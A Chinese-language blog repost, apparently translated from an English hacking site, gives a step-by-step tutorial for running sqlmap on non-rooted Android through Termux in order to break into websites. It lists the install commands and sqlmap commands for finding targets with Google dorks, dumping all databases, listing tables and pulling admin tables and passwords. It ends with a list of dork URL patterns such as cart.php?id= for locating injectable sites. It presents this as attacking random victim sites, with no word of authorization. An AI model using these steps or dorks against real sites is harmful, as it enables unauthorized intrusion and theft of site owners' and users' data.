如何在没有ROOT访问的Android上执行SQL注入

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何在没有ROOT访问的Android上执行SQL注入相关的知识,希望对你有一定的参考价值。


大家好,今天我将向您展示如何在没有root权限的情况下在Android上安装SQLMAP,并使用SQL注入攻击网站。


sqlmap是为Linux设计的,它基于一些基本的SQL注入漏洞,如盲注,时间注入,报错注入等。我个人发现了这个技巧并将它带给你们,这适用于非ROOT手机而且它不需要太多的空间来安装。所以你可以使用它几乎不需要20MB储存。


此外它不需要任何Linux发行版,您可以在小型手机中使用它。而且我亲自在许多手机上进行了测试,它都能正常工作。


附上一条独家视频,它会帮助您更好地理解!




让我们开始吧!


要求


Termux  (Linux终端包含许多内置命令)


Sqlmap  (用于SQL注入)


文件管理器  (查看日志和数据库)

 

Android上的SQLMAP:安装


首先安装上述链接中的所有应用程序并至少运行一次。下载SqlMap的ZIP文件并解压它在SD卡中并更改其名称。


之后,打开Termux并运行命令。


如何在没有ROOT访问的Android上执行SQL注入


apt update && apt upgrade


它需要一些时间来更新,会提示你需要一些空间。您只需简单安装,按y即可。


如果您使用的是android 6.0+版手机,那么您需要运行此命令,或者如果您使用较低版本,则可以跳过。这不是强制性的,但我建议你运行它。


如何在没有ROOT访问的Android上执行SQL注入


termux-setup-storage


它会提示允许使用你的内部存储。继续点击允许按钮,然后执行下一步。


如何在没有ROOT访问的Android上执行SQL注入


packages install python2


该命令将在您的termux中安装Python。输入y以在termux中安装python2。


继续!


可以了,好了!你只需要在手机中找到sqlmap.py脚本。为了实现这一点,首先你需要访问根文件夹,所以首先运行:


cd /


然后输入


cd sdcard


cd ls 


它会显示所有包含的文件。现在你需要找到sqlmap-master (提取的文件夹)。


cd sqlmap-master 


cd sqlmap-master


输入sqlmap-master(上面的命令)两次。


如果您已经将sqlmap-master的名称更改为sqlmap, 那么您可以运行,


cd sqlmap


cd sqlmap-master


您可以借助   “ ls” 命令列出该位置的所有文件。


cd到存储sqlmap.py的sqlmap-master文件夹。现在运行sqlmap你需要下面的命令:


如何在没有ROOT访问的Android上执行SQL注入

 

python2 sqlmap.py


如果你看到这个红色的sqlmap后就证明你完成了sqlmap的安装。下一步是使用sqlmap入侵网站,需要找到有SQL漏洞的网站。为此,请使用sqlmap google dork来查找网站。


如果您使用的是Google dork,请输入以下内容:


python2 sqlmap.py -g your_keyword 


如果你想使用直接URL,  那么:


python2 sqlmap.py -u your_url


你可以参考sqlmap的官方文档帮助,或者只需键入python2 sqlmap.py -h 查看基本帮助和 python2 sqlmap.py -hh 查看高级帮助。


如果你想破解整个网站的所有的数据库和表格,只需将-a 添加到任一命令中 python2 sqlmap.py -g your_keyword  或  python2 sqlmap.py -u your_url 


在google dork中,它会给你三个选项:


1.是攻击第一个站点,从而产生结果。为了进一步处理,你需要输入“y”。


2.跳到下一个目标,你可以使用“n”。


3.退出时,使用“q”。


如何在没有ROOT访问的Android上执行SQL注入

设置攻击!


之后它将开始攻击受害者的网站。等到它完成,可能会提示您以下问题,只需点击“y”即可。

如何在没有ROOT访问的Android上执行SQL注入


之后,它会向您显示几个表格和其他入侵数据。不用担心,当进程完成时,您可以在日志中查看它。
现在,如果你想看到所有的表,你需要运行以下命令:
python2 sqlmap.py -u url --tables
如何在没有ROOT访问的Android上执行SQL注入

现在只需输入以下命令即可选择要查看的表。一般情况下,我想查看管理表、要查看密码,运行
python2 sqlmap.py -u url -T your_table name
这个命令会将你的表数据和日志文件保存在root文件夹中,这对于普通的非root用户来说是不可访问的,但不用担心,我们可以解决这个终端可以访问的问题,所以我们将把这个文件复制到你的内部存储器中
cp source //sdcard
只需用上述命令替换源代码,它将省略转储文件,现在使用内置文件管理器或使用ES文件管理器导航到文件位置

如何在没有ROOT访问的Android上执行SQL注入

成功!您在Android上使用sqlmap成功入侵网站。

 

谷歌语法
我在这里给出了一些重要的dorks,所以你可以很容易地找到易受SQL攻击的站点!
add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

原文:https://www.hackeroyale.com/sqlmap-on-android-nonrooted-tutorial/由华盟网翻译排版,转载请注明华盟网

你可能喜欢



以上是关于如何在没有ROOT访问的Android上执行SQL注入的主要内容,如果未能解决你的问题,请参考以下文章

java.sql.SQLException:Android 中用户'root'@'192.148.2.106'(使用密码:YES)的访问被拒绝

如何在没有 Root 的 Android 11 上安装 HttpCanary 证书

在Android中访问没有root的ARP表

如何在没有 root 访问权限的情况下获取已安装应用程序的 APK?

如何修改android sys下的文件

当您没有 admin/root/sudo 访问权限时如何在 Netezza 上终止长时间运行的查询